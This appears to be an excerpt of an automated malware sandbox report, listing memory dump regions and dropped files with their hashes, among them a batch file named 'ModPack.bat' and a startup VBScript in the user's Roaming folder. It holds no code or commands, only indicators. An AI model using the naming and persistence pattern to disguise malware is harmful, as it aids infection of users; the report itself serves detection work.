memory/4516-115-0x0000028EBFD00000-0x0000028EBFD0E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ModPack.bat
| MD5 | 105f33324f5807a250699b78a8972954 |
| SHA1 | c7e43ef81256e582a290a84a387a2163e35de9fb |
| SHA256 | 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5 |
| SHA512 | 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101 |
memory/600-129-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/600-130-0x00000217CD140000-0x00000217CD150000-memory.dmp
memory/600-131-0x00000217CD140000-0x00000217CD150000-memory.dmp
memory/600-144-0x00000217CD140000-0x00000217CD150000-memory.dmp
memory/600-149-0x00000217CD420000-0x00000217CD428000-memory.dmp
memory/600-150-0x00000217CD730000-0x00000217CD862000-memory.dmp
memory/1376-160-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/1376-161-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp
memory/4516-162-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/1376-164-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp
memory/1376-178-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp
memory/1376-195-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9a23d42415a265d33ff202c8a5d27cb0 |
| SHA1 | 8628830b4d68669de80bb16ea3ead90758f3fcd8 |
| SHA256 | 18ca45333ca6560f367d8a00d2d8551f3920e63718c6b0bae5d034c5cca766ea |
| SHA512 | 1d772e0441603d03e0f4301db7962e80fa1bde93eb76c76e9f26726f34778af915ae22faea0c8cec532528af9157b696cfb26c3a68af45e3513fae6b678e3ac0 |
C:\Users\Admin\AppData\Roaming\startup_str_358.vbs
| MD5 | e38f413342ebf7d2fc4b12d2acd8b0ac |
| SHA1 | 02cd62b28941e57f85ee1900506581cf72b97a5a |
| SHA256 | 04f9b8eed35f17a3c4fc423fb81a9a45b035b7121f9c3ff883ef8d05241722f3 |
| SHA512 | 9e57944317a9bbf81fbe40993d6c65f85c76b07dbb909db5800ce3895445525924783b7635b4218597adafc3d6e96174de5cc925fceaf95a0c88da2c0091360c |
memory/600-208-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/3956-213-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/4516-214-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp
memory/3956-215-0x0000021B72720000-0x0000021B72730000-memory.dmp
memory/3956-216-0x0000021B72720000-0x0000021B72730000-memory.dmp
memory/4516-217-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp
memory/3956-232-0x0000021B72720000-0x0000021B72730000-memory.dmp
memory/3956-236-0x0000021B72E50000-0x0000021B73174000-memory.dmp
memory/3956-238-0x0000021B736E0000-0x0000021B73730000-memory.dmp
memory/3956-239-0x0000021B73AE0000-0x0000021B73B92000-memory.dmp
memory/3956-240-0x0000021B73D70000-0x0000021B73F32000-memory.dmp
memory/3956-244-0x0000021B73860000-0x0000021B73872000-memory.dmp
memory/3956-245-0x0000021B73BE0000-0x0000021B73C1E000-memory.dmp
memory/3956-252-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/3956-253-0x0000021B72720000-0x0000021B72730000-memory.dmp